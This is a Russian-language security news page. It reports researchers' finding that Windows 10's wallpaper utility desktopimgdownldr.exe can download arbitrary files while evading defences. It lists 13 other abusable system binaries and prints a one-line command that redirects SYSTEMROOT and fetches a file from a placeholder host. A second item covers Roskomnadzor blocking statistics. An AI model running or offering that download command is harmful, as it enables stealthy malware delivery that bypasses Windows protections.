Механизм установки фона в Windows 10 позволяет загрузить вредонос
Главная » Новости

Механизм установки фона в Windows 10 позволяет загрузить вредонос

Екатерина Быстрова 03 Июля 2020 - 08:38
...
Механизм установки фона в Windows 10 позволяет загрузить вредонос

Исполняемые системные файлы Windows 10, отвечающие за установку фона рабочего стола и экрана блокировки, могут посодействовать злоумышленникам — с их помощью атакующий может загрузить на компьютер вредоносную программу в обход средств защиты.

Эти файлы известны под именем LoLBins (living-of-the-land binaries), они идут в комплекте с каждой версией ОС и служат вполне определённым безобидным целям. Однако киберпреступники могут использовать LoLBins на заключительном этапе своей атаки, чтобы скрыть вредоносную активность в системе.

Например, условный атакующий может задействовать LoLBins для загрузки и установки вредоносной программы, которая успешно обойдёт защитные механизмы Windows — контроль учётных записей пользователей (UAC) и политики WDAC.

В прошлом году эксперты Cisco Talos опубликовали список из 13 системных исполняемых файлов Windows, которые могут в теории загрузить и выполнить вредоносный код:

  • powershell.exe
  • bitsadmin.exe
  • certutil.exe
  • psexec.exe
  • wmic.exe
  • mshta.exe
  • mofcomp.exe
  • cmstp.exe
  • windbg.exe
  • cdb.exe
  • msbuild.exe
  • csc.exe
  • regsvr32.exe

Теперь к изучению проблемы подключились исследователи из SentinelOne. Они обнаружили, что desktopimgdownldr.exe (располагается в системной директории system32) также может послужить в качестве LoLBin.

Задача файла desktopimgdownldr.exe в Windows проста — устанавливать фон рабочего стола или экрана блокировки. По сути, это компонент всего механизма, отвечающего за персонализацию ОС.

Настройки функции установки фона рабочего стола допускают файлы в форматах JPG, JPEG, PNG. Как правило, файл desktopimgdownldr.exe работает с привилегиями администратора, однако команда SentinelOne выяснила, что этот компонент можно запустить с правами обычного пользователя для загрузки файлов из внешнего источника.

Если злоумышленник поменяет переменную среды %systemroot%, он сможет изменить директорию для загрузки произвольного файла и обойти средства защиты операционной системы:

set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr
Следующая главная новость »
AM LiveКарьера в информационной безопасности. Что ждёт в 2026 году? Обсудим на эфире AM Live, присоединяйтесь! »

Объем заблокированного Роскомнадзором запрещенного контента возрос на 59%
Татьяна Никитина 19 Января 2026 - 14:48
Соответствие законодательству РФ Общее Системы контентной веб-фильтрации
Объем заблокированного Роскомнадзором запрещенного контента возрос на 59%

В 2025 году с подачи РКН соцсети и мессенджеры удалили 1289 тыс. единиц запрещенного контента — против 810,5 тыс. в 2024-м. По числу блокировок лидировала категория наркотиков, по темпам прироста — средства обхода регуляторных ограничений.

Контроль на предмет распространения запрещенной информации осуществлялся в соцсетях «В контакте», «Одноклассники», «Мой мир», в видеосообществах TikTok, Likee и Rutube, а также в Telegram.

По итогам года объемы блокировок в разделении по категориям противозаконного контента выглядят следующим образом:

Как видим, список запрещенных в России материалов, которым руководствуется регулятор, был расширен. Продвижение средств обхода блокировок попало под запрет в 2024 году и начало активно набирать статистику из-за роста спроса на такие инструменты в условиях ограничения работы иностранных соцсетей и мессенджеров.

Правоприменение норм по защите детей и подростков от киберрисков за последние два года претерпело изменения, и информация, которую ранее можно было трактовать двояко, теперь с уверенностью определяется как запрещенная — из-за вреда, который она может нанести незрелым умам.

Опрошенные «Ведомостями» эксперты отметили, что росту числа блокировок по требованию РКН способствуют общий рост объемов пользовательского контента, автоматизация мониторинга на веб-сервисах и ужесточение штрафных санкций за размещение запрещенных материалов либо предоставление доступа к ним.

К слову, в России также могут ввести штрафы за поиск запрещенных материалов — целенаправленный, в том числе с использованием VPN.

Сам Роскомнадзор для выявления противозаконного контента в настоящее время использует три инструмента: «Мир», «Окулус» и «Вепрь». Первый применяется для сбора и анализа текстовой информации, второй — для идентификации и обработки графики и видео, третий является средством прогнозной аналитики; параллельное использование этого трио повышает эффективность контроля в десятки раз.

AM LiveКарьера в информационной безопасности. Что ждёт в 2026 году? Обсудим на эфире AM Live, присоединяйтесь! »
Фишеры маскируют домен Microsoft через подмену m на rn
Новость
Фишеры маскируют домен Microsoft через подмену m на rn
Импульс Т1: без новых инженеров о технологическом рывке говорить рано
Новость
Импульс Т1: без новых инженеров о технологическом рывке гово...
Ростелеком выкупил 5% Базальт СПО и готов увеличить долю до 25%
Новость
Ростелеком выкупил 5% Базальт СПО и готов увеличить долю до...

RSS: Новости на портале Anti-Malware.ru

Свидетельство о регистрации СМИ ЭЛ № ФС 77 - 68398, выдано федеральной службой по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор) 27.01.2017
Разрешается частичное использование материалов на других сайтах при наличии ссылки на источник. Использование материалов сайта с полной копией оригинала допускается только с письменного разрешения администрации.

© ООО "АМ Медиа", 2005-2025. Все права защищены.